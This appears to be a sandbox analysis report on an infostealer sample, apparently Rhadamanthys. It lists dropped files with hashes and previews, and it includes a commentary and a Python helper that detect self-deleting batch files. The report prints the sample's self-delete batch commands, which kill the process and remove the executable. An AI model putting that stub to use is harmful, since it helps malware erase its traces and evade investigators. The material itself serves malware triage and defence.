3b5074b1b5d032e5620f69f9f700ff0e | 174 Power Global_Enrollment_.docx.doc | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | mjjt5kTb4o.lnk | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 122046760.bat | malicious | RHADAMANTHYS | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | pkqLAMAv96.lnk | malicious | RHADAMANTHYS | 149.154.167.220
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.4688091813513664
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:XFXTXipENEe+mWbk6Inauou7vCH28/k+QbOdDu76rfAIO8gH:NQEfWbk9asDCzsZKDu76rfAIO8o
                                                                                              MD5:34D677545093F7A6C20E22C905AEEFDD
                                                                                              SHA1:FB3D13B16D944D9488B1885A4C583A0FA7836AB9
                                                                                              SHA-256:4AAE1BA0E29A37278D822369794B85A5118626D5B654F45E4CB027C67F594F0B
                                                                                              SHA-512:2B1248BBC7B5091CB4204F4C5BCA2E4E2DB090AA3D6CBA4B034AECAB2A34A90D66C072DF8F384179868187B7025DE0ED6A11D42E1A4D78FDBE78C4DBDD48E6BB
                                                                                              Malicious:true
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.3.5.2.8.8.9.2.3.5.8.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.3.5.2.8.9.5.0.1.6.0.9.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.3.0.a.b.4.e.2.-.6.6.6.9.-.4.0.4.3.-.9.8.9.5.-.1.0.1.f.f.6.9.f.2.b.c.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.5.f.0.6.9.d.-.8.b.2.f.-.4.a.7.4.-.b.a.8.7.-.0.3.f.7.a.7.1.6.7.a.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.y.E.D.Y.R.U.0.j.w...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.a.c.-.0.0.0.1.-.0.0.5.0.-.7.0.3.a.-.2.f.1.d.b.5.5.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.d.4.2.e.3.c.5.f.c.2.4.e.3.0.9.5.8.1.8.1.9.c.b.a.7.2.3.b.1.4.c.3.c.2.4.7.d.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Dec 17 18:54:49 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):266339
                                                                                              Entropy (8bit):3.9546241866131155
                                                                                              Encrypted:false
                                                                                              SSDEEP:3072:LlqfT4I5/XRqRQqoE8MYeErJmFQcd/Pm4uEqwyjLTgIh:L8LP3qRQqoE8MYeErJmOqm4NyXTgM
                                                                                              MD5:D5852BD2F9F77EDA720D4CDCA228DDF1
                                                                                              SHA1:6111E1C52F8BEA6D4A7331BCEF9C27C3A30996BE
                                                                                              SHA-256:2D7ABB6D9280BEC2F438B2B084B0C2A8347E401E718A9B9CB988E9BFFE8BC206
                                                                                              SHA-512:3E9938BE1CEEA22E79DE95E969C25FEA85A51E570C3B8BD08F45A65202F244A62310C4DA8C35E5F34DADF8CF8674B792B66F2BCF1EA46FD6D136BF3BEFF5B226
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .........ag............4............0..H.......<...d7.......$..rK..........`.......8...........T...........X................7...........9..............................................................................bJ......$:......GenuineIntel...........T.............ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8358
                                                                                              Entropy (8bit):3.685387794341904
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R9l7lZNi0kZ6M6YP7SU8kugmfZqqP7pDp89beRsfKqm:R9lnNix6M6YzSUcgmfPweKf+
                                                                                              MD5:F4B1CDDCEA5E8F9FB36C54C70C253FFE
                                                                                              SHA1:F6B85E3B1E888089756407331D8354832DE9D02C
                                                                                              SHA-256:78AE67A2E025D4D34DAC24009E66C653CA87065E43D0E94144F8583CAAF9D50A
                                                                                              SHA-512:236E12D51E7BD1298C8DD382C5C98936ED5080014B7DA509669701035C48CC29427456D7F2CDFBDC4CBA5E509A77CCF396E544B210A34259E8465EBFE96D89A2
                                                                                              Malicious:false
                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.4.<./.P.i.
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):4863
                                                                                              Entropy (8bit):4.488316587145011
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:cvIwwtl8zsTqe702I7VFJ5WS2CfjkHSs3rm8M4JmpMPFB+q8vrpMKLNegD5d:uILfTP7GySPfoJTKxLNegtd
                                                                                              MD5:A3B7F76DA68467BE42BD361B5DF317F3
                                                                                              SHA1:59AA872734C4625E686E2FB5FDB2DFF413B6433C
                                                                                              SHA-256:E23BEFC8E07D1CF39947DBA8369C0BEB1C073F9C66A9DE31DFE912248AD7850A
                                                                                              SHA-512:577E0A23BC5DFC02A07F81E106D58343821978FB1D1E20822BE322AA2ACE2F8A690FB5EB50C0DE5D61F50F7DA57398FC1FE386E4E1A6DDFBA4E18CAF625E70C6
                                                                                              Malicious:false
                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222979446" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):15119
                                                                                              Entropy (8bit):5.63468773874796
                                                                                              Encrypted:false
                                                                                              SSDEEP:384:L9iIuERzA83h09RZxeI4bO8y8eIKf+qNV:gIuERzA83h09RZxwO8y8eIKfHNV
                                                                                              MD5:AFC16C019BBEB3904B37576B9179D9CD
                                                                                              SHA1:DBA86847FFE7AD2E887F1A51FBD464357850488D
                                                                                              SHA-256:8EEE2E854F6C97ADB60D3E4F2A7AB51CF1EFC387C672D950E609A4EBA1752748
                                                                                              SHA-512:752C02768963163D8D20219FEB7A83C2EEAC6C4B5E7F97B035815334B7BB6D327053FA089410BA6D2328B85B9A464F651945F60AD36BD822D1E54E31434C5875
                                                                                              Malicious:false
                                                                                              Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:JSON data
                                                                                              Category:dropped
                                                                                              Size (bytes):103985
                                                                                              Entropy (8bit):6.082865991437579
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:QJFxqXOHF+7gFajcCN5tTsxDxEM0pMtwGUFJ526GH1B1WAUt6+1NJsf:QxwOl+V95+xDxLqMtwGU2B1s6+/K
                                                                                              MD5:6DE273C47E7F54F2910BC516F886633B
                                                                                              SHA1:230A6D3F3510D1231BCDAD4F4BD843F1575A84A5
                                                                                              SHA-256:89545282AD73EE9D530E4BACEE9A2046322C767CB7564E8E12694F30CF8CDDEF
                                                                                              SHA-512:AB5488E0C9622FCC6F4610B0501E79EA87C1963480E8E9F217B46F94E7DDFD32FE0BED9D1329093C58F2D330A49E2D8468CDFD4C6CC8689590671B36F9504617
                                                                                              Malicious:false
                                                                                              Preview:{"accessibility":{"screen_ai":{"last_used_time":"13370432463378508"}},"autofill":{"ablation_seed":"f4fbGGU/iY4=","states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13369750774825357"},"browser":{"default_browser_infobar_declined_count":1,"default_browser_infobar_last_declined_time":"13370432455860460","default_browser_prompt_refresh_study_group":"enabled-v2-arm-3","last_redirect_origin":"","last_whats_new_version":128,"shortcut_migration_version":"92.0.4515.159","whats_new_hats_activation_threshold":64},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"local":{"password_hash_data_list":[]},"management":{"platform"
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):107
                                                                                              Entropy (8bit):5.240677851248881
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HFTEOuMJcFKsoEByTAlwBRZDEXEPONy+WfVXbn:yOuMJNEByMlweonRdLn
                                                                                              MD5:EB26DD13244C0F7D083DD66112D54178
                                                                                              SHA1:3690C8F2613713B5B127CD41E6790D2CB4DC88C0
                                                                                              SHA-256:D90C444F8367652B9D78C407F021BF2B7B1A9E40A07F7D21AF0DDED22FC9A037
                                                                                              SHA-512:92E3EB0891D1C45CC8E6BAB52E1387494D3690B62905058BFBC07D73917A82B881E763585A3B382993321A232EBB6DE726695618EA7645E5B0984B740F38EC3E
                                                                                              Malicious:false
                                                                                              Preview:chcp 65001..TaskKill /F /IM 4524..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\zyEDYRU0jw.exe"..
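The 107-byte batch file previewed above (the preview renders each CR/LF as "..") is a self-removal stub: switch the console code page, kill a process, wait two seconds, delete the sample from the Desktop. Two details matter for triage. `Del /ah` removes only files that carry the hidden attribute, so the stub expects the sample to have hidden itself beforehand. `TaskKill /IM` takes an image name such as zyEDYRU0jw.exe, while `/PID` takes a process id, so the numeric argument 4524 reads like a PID handed to the wrong switch; if so, the kill fails and the stub relies on the process having exited on its own before `Del` runs. The following Python is an added triage helper for dropped batch files, not code from the sandbox or from the sample; `SAMPLE_BAT` is reconstructed from the preview text (not the byte-exact dropped file) and the analyser's field names are this example's own.

```python
"""Flag self-delete stubs in dropped batch files (added example, not sandbox code)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Reconstructed from the report preview, which shows CR/LF as ".."; this is
# constructed sample input, not the byte-exact file the sample dropped.
SAMPLE_BAT = "\r\n".join([
    "chcp 65001",
    "TaskKill /F /IM 4524",
    "Timeout /T 2 /Nobreak",
    'Del /ah "C:\\Users\\user\\Desktop\\zyEDYRU0jw.exe"',
]) + "\r\n"

BENIGN_BAT = "@echo off\r\ndir\r\n"  # constructed negative case


@dataclass
class BatchFindings:
    kill_switch: Optional[str] = None      # "IM" or "PID"
    kill_target: Optional[str] = None      # image name or pid as written
    delay_seconds: Optional[int] = None    # from timeout /t or ping -n
    deleted_paths: List[str] = field(default_factory=list)
    deletes_hidden: bool = False           # del /a:h or /ah present
    notes: List[str] = field(default_factory=list)

    @property
    def is_self_delete_stub(self) -> bool:
        # kill -> wait -> delete an .exe is the classic self-removal shape
        return (self.kill_target is not None
                and self.delay_seconds is not None
                and any(p.lower().endswith(".exe") for p in self.deleted_paths))


_KILL = re.compile(r"^\s*taskkill\b(?P<args>.*)$", re.I)
_SWITCH = re.compile(r"/(?P<name>im|pid)\s+(?P<value>\"[^\"]+\"|\S+)", re.I)
_TIMEOUT = re.compile(r"^\s*timeout\b.*?/t\s+(?P<secs>\d+)", re.I)
_PING_DELAY = re.compile(r"^\s*ping\b.*?-n\s+(?P<count>\d+)", re.I)
_DEL = re.compile(r"^\s*(?:del|erase)\b(?P<args>.*)$", re.I)
_TOKEN = re.compile(r"\"[^\"]+\"|\S+")


def analyse_batch(text: str) -> BatchFindings:
    """Walk the script line by line and collect the kill/wait/delete evidence."""
    f = BatchFindings()
    for line in text.splitlines():
        if m := _KILL.match(line):
            if s := _SWITCH.search(m["args"]):
                f.kill_switch = s["name"].upper()
                f.kill_target = s["value"].strip('"')
                if f.kill_switch == "IM" and f.kill_target.isdigit():
                    f.notes.append(
                        "taskkill /IM given a numeric argument: /IM expects an image "
                        "name and /PID a process id, so this kill likely fails")
        elif m := _TIMEOUT.match(line):
            f.delay_seconds = int(m["secs"])
        elif m := _PING_DELAY.match(line):
            # `ping -n N` is the other common delay idiom; it waits roughly N-1 seconds
            f.delay_seconds = max(int(m["count"]) - 1, 0)
        elif m := _DEL.match(line):
            args = m["args"]
            if re.search(r"/a:?h\b", args, re.I):
                f.deletes_hidden = True
            f.deleted_paths += [t.strip('"') for t in _TOKEN.findall(args)
                                if not t.startswith("/")]
    return f


if __name__ == "__main__":
    result = analyse_batch(SAMPLE_BAT)
    print("self-delete stub:", result.is_self_delete_stub)
    print("kills:", result.kill_switch, result.kill_target)
    print("deletes:", result.deleted_paths, "hidden-only:", result.deletes_hidden)
    for note in result.notes:
        print("note:", note)
```

Run it against any `.bat`/`.cmd` recovered from `%TEMP%` during triage; the deleted path gives you the on-disk name of the payload even when the executable itself is gone by the time you image the host.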
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):98304
                                                                                              Entropy (8bit):0.08231524779339361
                                                                                              Encrypted:false
                                                                                              SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                              MD5:886A5F9308577FDF19279AA582D0024D
                                                                                              SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                              SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                              SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):294912
                                                                                              Entropy (8bit):0.08434615749937499
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:2va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vPY:21zkVmvQhyn+Zoz67R
                                                                                              MD5:93BAA1B7500F3ADB16BE27FCB2E256A8
                                                                                              SHA1:77CB640557F5F7950B083405B4AEE0573D11D98F
                                                                                              SHA-256:7C24FE957EFB0DDF026ECDD88027BE5B40863342CF2CF2A5A7FF72062F75B1E9
                                                                                              SHA-512:C53D09227E5069924E49823CD6E93775B98439D57D279BEEFFE14EA057BF9D9882CE1BC297C0181D0309E027E7993F079D6BF4933A929D2C942903D28DB155AB
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`.....z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 27, 1st free page 7, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 3
                                                                                              Category:dropped
                                                                                              Size (bytes):57344
                                                                                              Entropy (8bit):0.7310370201569906
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:qsvKLyeymO9K3PlGNxotxPUCbn8MouON3n:q86PlGNxss27e
                                                                                              MD5:A802F475CA2D00B16F45FEA728F2247C
                                                                                              SHA1:AF57C02DA108CFA0D7323252126CC87D7B608786
                                                                                              SHA-256:156ADDC0B949718CF518720E5774557B134CCF769A15E0413ABC257C80E58684
                                                                                              SHA-512:275704B399A1C236C730F4702B57320BD7F034DC234B7A820452F8C650334233BD6830798446664F133BA4C77AA2F91E66E901CE8A11BD8575C2CD08AB9BE98F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):122880
                                                                                              Entropy (8bit):1.1414673161713362
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6:8t4n/9p/39J6hwNKRmqu+7VusE
                                                                                              MD5:24937DB267D854F3EF5453E2E54EA21B
                                                                                              SHA1:F519A77A669D9F706D5D537A203B7245368D40CE
                                                                                              SHA-256:369B8B4465FB5FD7F12258C7DEA941F9CCA9A90C78EE195DF5E02028686869ED
                                                                                              SHA-512:AED398C6781300E732105E541A6FDD762F04E0EC5A5893762BFDCBDD442348FAF9CB2711EFDC4808D4675A8E48F77BEAB3A0D6BC635B778D47B2DADC9B6086A3
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 4, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 4
                                                                                              Category:dropped
                                                                                              Size (bytes):49152
                                                                                              Entropy (8bit):0.86528072116055
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:kTN7KLWlGxdKmtZeympbn8MouB6w9f/rrGMa:qVlGxdKN7Iw9fj
                                                                                              MD5:8CC409C8658C3F05143C1484A1719879
                                                                                              SHA1:909CDE14664C0E5F943764895E0A9DFEC7831FF5
                                                                                              SHA-256:BC69C3518DA2ABC8904F314F078D9672BAF3B840E09FD2B2E95D4B07A03A85A4
                                                                                              SHA-512:55D8923B6481ADF442817B7BAA50C36CBAD8DAC0EC600451813D29F4775DE519A06158A6233E61635CD0ED862E60AC7F50C75556C4E89D583D8A8A4299F1808F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                              Category:dropped
                                                                                              Size (bytes):20480
                                                                                              Entropy (8bit):1.4026573159402624
                                                                                              Encrypted:false
                                                                                              SSDEEP:48:TB9aw/aHLopFMavU1/iB8eVC+rQ88TkQqp8JHyDlEKw0esEieNp:1PareMa8K8eVC+rZ8TkQqpWSDlNufp
                                                                                              MD5:F49DFF163167A43F4940B7337A092C07
                                                                                              SHA1:1A8BAAC92537FA0BD39063D17C3072AD86190CC4
                                                                                              SHA-256:B3D38278030DBEA9D1CDDC177F9B6CB590CE1D383A88211B231402B7CA208CF3
                                                                                              SHA-512:BC7685763D70300FE2AE28803D9F886D91004F6045A995065FAAEB6A9DFCAB77E80B475516E9B4C1F8969E112E2B48C7E68FC2AB15F61BB69443A8C54E24066F
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ ..........................................................................v.......@..g.....@....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:yD1DgPn0BkoOQuA5bUWDX6+7VuP7Ewvjd:A1cPn0BktQuubrt7VuP7Ewrd
                                                                                              MD5:5B01CD9FA62FDF35D1A4587F2676CA31
                                                                                              SHA1:25BBFAC890114F4ECE0BF818F504FFE6102004B8
                                                                                              SHA-256:74D3D72E8CEB233D400747C902F3331B3824902C81B6EF8AA3D7AC85A7A3F095
                                                                                              SHA-512:A565038CDF3C69621F31D8DE4558F74375AADF1DC881C2C82A877C105437F7F9B1D97D1652E98566984EFCA8F1C39224B40B450C742610395A265D81362254DC
                                                                                              Malicious:false
                                                                                              Preview:SQLite format 3......@ .......A...........W......................................................v............A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\zyEDYRU0jw.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 14, database pages 65, cookie 0x57, schema 4, UTF-8, version-valid-for 14
                                                                                              Category:dropped
                                                                                              Size (bytes):135168
                                                                                              Entropy (8bit):1.0873605234887023
                                                                                              Encrypted:false
